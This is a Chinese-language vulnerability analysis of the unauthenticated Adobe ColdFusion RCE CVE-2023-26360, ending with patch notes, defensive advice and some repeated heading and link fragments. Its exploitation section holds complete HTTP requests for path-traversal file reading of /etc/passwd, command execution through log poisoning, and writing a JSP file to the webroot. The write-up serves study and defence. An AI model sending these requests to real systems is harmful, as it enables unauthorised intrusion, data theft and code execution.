Adobe ColdFusion未授权RCE漏洞分析(CVE-2023-26360)技术文档<\/h1>

漏洞概述<\/h2>

CVE-2023-26360是Adobe ColdFusion中存在的一个未授权远程代码执行(RCE)漏洞，影响以下版本：<\/p>

Adobe ColdFusion 2018版本 < 2018.0.16<\/li>

Adobe ColdFusion 2021版本 < 2021.0.6<\/li> <\/ul>

该漏洞允许攻击者在无需认证的情况下，通过特制请求实现任意文件读取、文件写入和远程代码执行。<\/p>

漏洞分析环境<\/h2>

分析版本：Adobe ColdFusion 2018.0.15<\/li>

漏洞利用入口：

\/cf_scripts\/scripts\/ajax\/ckeditor\/plugins\/filemanager\/filemanager.cfc<\/code><\/li>
<\/ul>
漏洞原理分析<\/h2>
路由处理流程<\/h3>

请求首先由coldfusion.bootstrap.BootstrapServlet<\/code>处理<\/li>
实际处理类为coldfusion.xml.rpc.CFCServlet<\/code><\/li>
权限检查存在绕过问题：

使用IPFilterUtils.checkAdminAccess()<\/code>进行权限检查<\/li>
检查逻辑使用req.getRequestURI()<\/code>和startsWith()<\/code>判断<\/li>
可通过路径变形绕过(如\/CFIDE\/\/adminapi<\/code>)<\/li>
<\/ul>
<\/li>
<\/ol>
关键处理流程<\/h3>


GlobalsFilter<\/strong>：<\/p>

初始化请求信息<\/li>
封装请求数据到不同scope中<\/li>
<\/ul>
<\/li>

ComponentFilter<\/strong>：<\/p>

需要设置_cfclient=true<\/code>触发漏洞点<\/li>
FilterUtils.GetArgumentCollection(context)<\/code>处理用户请求数据<\/li>
存在WDDX反序列化操作(CVE-2023-29300)<\/li>
数据传递给JSONUtils.deserializeJSON()<\/code>处理<\/li>
<\/ul>
<\/li>
<\/ol>
核心漏洞点<\/h3>


JSONUtils.deserializeJSON()<\/code>函数：<\/p>

从用户请求中获取classname<\/code>参数<\/li>
传递给TemplateProxyFactory.resolveFile()<\/code>处理<\/li>
<\/ul>
<\/li>

TemplateProxyFactory.resolveFile()<\/code>：<\/p>

根据指定路径加载类文件<\/li>
非标准Java字节码文件会被自动编译<\/li>
编译后的类继承自coldfusion.runtime.CFPage<\/code><\/li>
最终调用新编译类的runPage()<\/code>方法<\/li>
<\/ul>
<\/li>

文件处理特性：<\/p>

编译后的文件缓存至\/app\/WEB-INF\/cfclasses\/<\/code>目录<\/li>
支持路径遍历(如..\/..\/..\/..\/etc\/passwd<\/code>)<\/li>
<\/ul>
<\/li>
<\/ol>
CFML语言利用<\/h3>
ColdFusion使用CFML(ColdFusion Markup Language)语言，包含危险函数：<\/p>

文件操作：<cffile action="write"><\/code><\/li>
命令执行：<cfexecute><\/code><\/li>
文件读取：<cffile action="read"><\/code><\/li>
<\/ul>
漏洞利用方法<\/h2>
任意文件读取<\/h3>
POST<\/span> \/cf_scripts\/scripts\/ajax\/ckeditor\/plugins\/filemanager\/filemanager.cfc?method=foo&_cfclient=true HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 127.0.0.1:8500<\/span>
<\/span><\/span>Content-Length:<\/span> 90<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>
<\/span><\/span>_variables={"_metadata":{"classname":"..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/etc\/passwd"}}
<\/span><\/span><\/code><\/pre>命令执行<\/h3>

写入命令到日志文件：<\/li>
<\/ol>
POST<\/span> \/cf_scripts\/scripts\/ajax\/ckeditor\/plugins\/filemanager\/filemanager.cfc?method=foo&_cfclient=true HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 127.0.0.1:8500<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>
<\/span><\/span>_variables=<cfexecute name='id' outputFile='\/tmp\/aaa' ><\/cfexecute>
<\/span><\/span><\/code><\/pre>
执行日志文件中的命令：<\/li>
<\/ol>
POST<\/span> \/cf_scripts\/scripts\/ajax\/ckeditor\/plugins\/filemanager\/filemanager.cfc?method=foo&_cfclient=true HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 127.0.0.1:8500<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>
<\/span><\/span>_variables={"_metadata":{"classname":"..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/opt\/coldfusion\/cfusion\/logs\/coldfusion-out.log","_variables":[]}}
<\/span><\/span><\/code><\/pre>文件写入<\/h3>

写入文件：<\/li>
<\/ol>
POST<\/span> \/cf_scripts\/scripts\/ajax\/ckeditor\/plugins\/filemanager\/filemanager.cfc?method=foo&_cfclient=true HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 127.0.0.1:8500<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>
<\/span><\/span>_variables=<cfscript>fileWrite('\/opt\/coldfusion\/cfusion\/wwwroot\/cf_scripts\/demo.jsp','<%=233%>');<\/cfscript>
<\/span><\/span><\/code><\/pre>
执行写入的文件：<\/li>
<\/ol>
POST<\/span> \/cf_scripts\/scripts\/ajax\/ckeditor\/plugins\/filemanager\/filemanager.cfc?method=foo&_cfclient=true HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>Host:<\/span> 127.0.0.1:8500<\/span>
<\/span><\/span>Content-Type:<\/span> application\/x-www-form-urlencoded<\/span>
<\/span><\/span>
<\/span><\/span>_variables={"_metadata":{"classname":"..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/..\/opt\/coldfusion\/cfusion\/logs\/coldfusion-out.log","_variables":[]}}
<\/span><\/span><\/code><\/pre>补丁分析<\/h2>
官方修复方式：<\/p>

限制cfclient<\/code>请求的文件后缀必须为.cfc<\/code><\/li>
只能请求服务器上已有的cfc文件<\/li>
<\/ul>
防御建议<\/h2>


及时升级到安全版本：<\/p>

Adobe ColdFusion 2018 >= 2018.0.16<\/li>
Adobe ColdFusion 2021 >= 2021.0.6<\/li>
<\/ul>
<\/li>

网络层面防护：<\/p>

限制对\/cf_scripts\/<\/code>路径的访问<\/li>
实施严格的输入验证<\/li>
<\/ul>
<\/li>

系统层面：<\/p>

最小化ColdFusion运行权限<\/li>
定期审计日志文件<\/li>
<\/ul>
<\/li>
<\/ol>
参考链接<\/h2>

https:\/\/blog.securelayer7.net\/unauthorized-rce-in-adobe-coldfusion\/<\/li>
https:\/\/attackerkb.com\/topics\/F36ClHTTIQ\/cve-2023-26360\/rapid7-analysis<\/li>
https:\/\/shfsec.com\/cve-analysis-adobe-coldfusion-from-lfi-to-rce-cve-2023-26359-cve-2023-26360<\/li>
<\/ol>

Adobe ColdFusion未授权RCE漏洞分析(CVE-2023-26360)技术文档<\/h1>

漏洞原理分析<\/h2>

漏洞利用方法<\/h2>

参考链接<\/h2> https:\/\/blog.securelayer7.net\/unauthorized-rce-in-adobe-coldfusion\/<\/li> https:\/\/attackerkb.com\/topics\/F36ClHTTIQ\/cve-2023-26360\/rapid7-analysis<\/li> https:\/\/shfsec.com\/cve-analysis-adobe-coldfusion-from-lfi-to-rce-cve-2023-26359-cve-2023-26360<\/li> <\/ol>

参考链接<\/h2>

https:\/\/blog.securelayer7.net\/unauthorized-rce-in-adobe-coldfusion\/<\/li>
https:\/\/attackerkb.com\/topics\/F36ClHTTIQ\/cve-2023-26360\/rapid7-analysis<\/li>
https:\/\/shfsec.com\/cve-analysis-adobe-coldfusion-from-lfi-to-rce-cve-2023-26359-cve-2023-26360<\/li> <\/ol>